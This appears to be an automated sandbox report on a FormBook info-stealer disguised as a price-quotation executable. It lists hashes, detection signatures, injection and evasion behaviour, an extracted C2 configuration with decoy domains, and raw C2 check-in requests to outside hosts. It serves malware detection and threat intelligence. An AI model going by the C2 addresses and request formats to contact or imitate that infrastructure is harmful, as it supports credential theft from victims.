Windows Analysis Report PRICE_REQUEST_QUOTATION.exe

Overview

General Information

Sample Name: PRICE_REQUEST_QUOTATION.exe
Analysis ID: 491948
MD5: 85589170af713a03ca622f94429c634a
SHA1: 4e0b9dfd13dd6e4b85bca4352be0cec2be9024d7
SHA256: dae6ba220bb0a34de731b57965753391343bfe96f9f3fa4fea48102d3377ccf7
Tags: exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}
Multi AV Scanner detection for submitted file
Source: PRICE_REQUEST_QUOTATION.exe Virustotal: Detection: 34% Perma Link
Source: PRICE_REQUEST_QUOTATION.exe ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll ReversingLabs: Detection: 13%
Machine Learning detection for sample
Source: PRICE_REQUEST_QUOTATION.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.wscript.exe.c28870.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.wscript.exe.516796c.4.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Uses 32bit PE files
Source: PRICE_REQUEST_QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source: Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe Network Connect: 154.208.173.139 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe Network Connect: 109.106.246.165 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe Network Connect: 185.107.56.60 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe Domain query: www.patrickandmaxine.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.nudesalon.digital/rgoe/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNSERVERSUS CNSERVERSUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.patrickandmaxine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.nailsestetic.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.futurodr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.babeshotnud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: PRICE_REQUEST_QUOTATION.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PRICE_REQUEST_QUOTATION.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp String found in binary or memory: http://survey-smiles.com
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp String found in binary or memory: https://bitninja.io
Source: unknown DNS traffic detected: queries for: www.appleluis.host
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.patrickandmaxine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.nailsestetic.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.futurodr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.babeshotnud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000002.273624416.000000000069A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404FF1

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: PRICE_REQUEST_QUOTATION.exe
Uses 32bit PE files
Source: PRICE_REQUEST_QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
